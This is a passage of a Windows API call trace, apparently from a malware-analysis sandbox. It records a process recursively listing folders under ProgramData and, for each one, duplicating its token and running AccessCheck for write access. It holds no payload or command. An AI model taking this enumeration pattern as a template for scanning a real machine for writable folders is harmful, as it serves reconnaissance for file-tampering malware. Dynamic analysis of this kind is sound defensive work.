Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.269] GetLastError () returned 0x7a [0106.269] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", RequestedInformation=0x7, pSecurityDescriptor=0x572cc0, nLength=0xcc, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x572cc0, lpnLengthNeeded=0x281baf8) returned 1 [0106.269] GetLastError () returned 0x7a [0106.269] GetCurrentThread () returned 0xfffffffe [0106.269] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.269] GetCurrentProcess () returned 0xffffffff [0106.269] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.269] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.269] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.269] AccessCheck (in: pSecurityDescriptor=0x572cc0, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.269] CloseHandle (hObject=0x344) returned 1 [0106.269] CloseHandle (hObject=0x33c) returned 1 [0106.269] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.269] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.269] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.270] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.270] GetLastError () returned 0x7a [0106.270] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages", RequestedInformation=0x7, pSecurityDescriptor=0x57f730, nLength=0xcc, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x57f730, lpnLengthNeeded=0x281b560) returned 1 [0106.270] GetLastError () returned 0x7a [0106.270] GetCurrentThread () returned 0xfffffffe [0106.270] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.270] GetCurrentProcess () returned 0xffffffff [0106.270] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.270] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.270] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.270] AccessCheck (in: pSecurityDescriptor=0x57f730, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.270] CloseHandle (hObject=0x32c) returned 1 [0106.270] CloseHandle (hObject=0x344) returned 1 [0106.270] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.270] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.270] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*", lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0x5fc1d8 [0106.270] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281afc8) returned 0 [0106.271] GetLastError () returned 0x7a [0106.271] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64", RequestedInformation=0x7, pSecurityDescriptor=0x57f858, nLength=0xcc, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x57f858, lpnLengthNeeded=0x281afc8) returned 1 [0106.271] GetLastError () returned 0x7a [0106.271] GetCurrentThread () returned 0xfffffffe [0106.271] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x0) returned 0 [0106.271] GetCurrentProcess () returned 0xffffffff [0106.271] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x32c) returned 1 [0106.271] DuplicateToken (in: ExistingTokenHandle=0x32c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281afcc | out: DuplicateTokenHandle=0x281afcc*=0x340) returned 1 [0106.271] MapGenericMask (in: AccessMask=0x281afdc, GenericMapping=0x281afac | out: AccessMask=0x281afdc) [0106.271] AccessCheck (in: pSecurityDescriptor=0x57f858, ClientToken=0x340, DesiredAccess=0x120116, GenericMapping=0x281afac, PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4 | out: PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4) returned 1 [0106.271] CloseHandle (hObject=0x340) returned 1 [0106.271] CloseHandle (hObject=0x32c) returned 1 [0106.271] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.271] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.271] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.271] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0 [0106.271] FindClose (in: hFindFile=0x5fc1d8 | out: hFindFile=0x5fc1d8) returned 1 [0106.271] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.271] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.271] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.271] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.271] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.271] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.272] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.272] GetLastError () returned 0x7a [0106.272] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}", RequestedInformation=0x7, pSecurityDescriptor=0x572cc0, nLength=0xcc, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x572cc0, lpnLengthNeeded=0x281baf8) returned 1 [0106.272] GetLastError () returned 0x7a [0106.272] GetCurrentThread () returned 0xfffffffe [0106.272] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.272] GetCurrentProcess () returned 0xffffffff [0106.272] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.272] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.272] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.272] AccessCheck (in: pSecurityDescriptor=0x572cc0, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.272] CloseHandle (hObject=0x344) returned 1 [0106.272] CloseHandle (hObject=0x33c) returned 1 [0106.272] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.272] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.272] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.272] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.272] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.272] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.272] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.273] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.273] GetLastError () returned 0x7a [0106.273] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}", RequestedInformation=0x7, pSecurityDescriptor=0x572cc0, nLength=0xcc, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x572cc0, lpnLengthNeeded=0x281baf8) returned 1 [0106.273] GetLastError () returned 0x7a [0106.273] GetCurrentThread () returned 0xfffffffe [0106.273] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.273] GetCurrentProcess () returned 0xffffffff [0106.273] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.273] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.273] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.273] AccessCheck (in: pSecurityDescriptor=0x572cc0, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.273] CloseHandle (hObject=0x344) returned 1 [0106.273] CloseHandle (hObject=0x33c) returned 1 [0106.273] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.273] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.273] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.273] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.273] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.273] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.273] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.274] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.274] GetLastError () returned 0x7a [0106.274] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}", RequestedInformation=0x7, pSecurityDescriptor=0x572cc0, nLength=0xcc, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x572cc0, lpnLengthNeeded=0x281baf8) returned 1 [0106.274] GetLastError () returned 0x7a [0106.274] GetCurrentThread () returned 0xfffffffe [0106.274] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.274] GetCurrentProcess () returned 0xffffffff [0106.274] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.274] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.274] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.274] AccessCheck (in: pSecurityDescriptor=0x572cc0, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.274] CloseHandle (hObject=0x344) returned 1 [0106.274] CloseHandle (hObject=0x33c) returned 1 [0106.274] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.274] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.274] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.274] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.274] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.274] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.274] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.274] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.275] GetLastError () returned 0x7a [0106.275] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", RequestedInformation=0x7, pSecurityDescriptor=0x572cc0, nLength=0xcc, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x572cc0, lpnLengthNeeded=0x281baf8) returned 1 [0106.275] GetLastError () returned 0x7a [0106.275] GetCurrentThread () returned 0xfffffffe [0106.275] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.275] GetCurrentProcess () returned 0xffffffff [0106.275] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.275] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.275] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.275] AccessCheck (in: pSecurityDescriptor=0x572cc0, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.275] CloseHandle (hObject=0x344) returned 1 [0106.275] CloseHandle (hObject=0x33c) returned 1 [0106.275] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.275] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.275] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.275] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.275] GetLastError () returned 0x7a [0106.275] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages", RequestedInformation=0x7, pSecurityDescriptor=0x57f730, nLength=0xcc, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x57f730, lpnLengthNeeded=0x281b560) returned 1 [0106.275] GetLastError () returned 0x7a [0106.275] GetCurrentThread () returned 0xfffffffe [0106.275] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.275] GetCurrentProcess () returned 0xffffffff [0106.276] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.276] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.276] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.276] AccessCheck (in: pSecurityDescriptor=0x57f730, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.276] CloseHandle (hObject=0x32c) returned 1 [0106.276] CloseHandle (hObject=0x344) returned 1 [0106.276] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.276] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.276] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0x5fc1d8 [0106.276] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281afc8) returned 0 [0106.276] GetLastError () returned 0x7a [0106.276] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86", RequestedInformation=0x7, pSecurityDescriptor=0x57f858, nLength=0xcc, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x57f858, lpnLengthNeeded=0x281afc8) returned 1 [0106.276] GetLastError () returned 0x7a [0106.276] GetCurrentThread () returned 0xfffffffe [0106.276] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x0) returned 0 [0106.276] GetCurrentProcess () returned 0xffffffff [0106.276] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x32c) returned 1 [0106.276] DuplicateToken (in: ExistingTokenHandle=0x32c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281afcc | out: DuplicateTokenHandle=0x281afcc*=0x340) returned 1 [0106.276] MapGenericMask (in: AccessMask=0x281afdc, GenericMapping=0x281afac | out: AccessMask=0x281afdc) [0106.276] AccessCheck (in: pSecurityDescriptor=0x57f858, ClientToken=0x340, DesiredAccess=0x120116, GenericMapping=0x281afac, PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4 | out: PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4) returned 1 [0106.276] CloseHandle (hObject=0x340) returned 1 [0106.276] CloseHandle (hObject=0x32c) returned 1 [0106.276] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.276] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.276] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.276] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0 [0106.277] FindClose (in: hFindFile=0x5fc1d8 | out: hFindFile=0x5fc1d8) returned 1 [0106.277] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.277] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.277] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.277] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.277] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 0 [0106.277] FindClose (in: hFindFile=0x5fc2d8 | out: hFindFile=0x5fc2d8) returned 1 [0106.277] FindNextFileW (in: hFindFile=0x5fc298, lpFindFileData=0x281c64c | out: lpFindFileData=0x281c64c) returned 1 [0106.277] FindFirstFileW (in: lpFileName="c:\\ProgramData\\regid.1991-06.com.microsoft\\*", lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 0x5fc2d8 [0106.288] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\regid.1991-06.com.microsoft", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281c090 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281c090) returned 0 [0106.288] GetLastError () returned 0x7a [0106.288] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\regid.1991-06.com.microsoft", RequestedInformation=0x7, pSecurityDescriptor=0x5727e0, nLength=0xa4, lpnLengthNeeded=0x281c090 | out: pSecurityDescriptor=0x5727e0, lpnLengthNeeded=0x281c090) returned 1 [0106.288] GetLastError () returned 0x7a [0106.288] GetCurrentThread () returned 0xfffffffe [0106.288] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281c098 | out: TokenHandle=0x281c098*=0x0) returned 0 [0106.288] GetCurrentProcess () returned 0xffffffff [0106.288] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281c098 | out: TokenHandle=0x281c098*=0x334) returned 1 [0106.288] DuplicateToken (in: ExistingTokenHandle=0x334, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281c094 | out: DuplicateTokenHandle=0x281c094*=0x33c) returned 1 [0106.288] MapGenericMask (in: AccessMask=0x281c0a4, GenericMapping=0x281c074 | out: AccessMask=0x281c0a4) [0106.288] AccessCheck (in: pSecurityDescriptor=0x5727e0, ClientToken=0x33c, DesiredAccess=0x120116, GenericMapping=0x281c074, PrivilegeSet=0x281c060, PrivilegeSetLength=0x281c084, GrantedAccess=0x281c088, AccessStatus=0x281c08c | out: PrivilegeSet=0x281c060, PrivilegeSetLength=0x281c084, GrantedAccess=0x281c088, AccessStatus=0x281c08c) returned 1 [0106.288] CloseHandle (hObject=0x33c) returned 1 [0106.288] CloseHandle (hObject=0x334) returned 1 [0106.288] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.288] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.288] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.288] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.288] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 0 [0106.289] FindClose (in: hFindFile=0x5fc2d8 | out: hFindFile=0x5fc2d8) returned 1 [0106.289] FindNextFileW (in: hFindFile=0x5fc298, lpFindFileData=0x281c64c | out: lpFindFileData=0x281c64c) returned 1 [0106.289] FindNextFileW (in: hFindFile=0x5fc298, lpFindFileData=0x281c64c | out: lpFindFileData=0x281c64c) returned 1 [0106.289] FindFirstFileW (in: 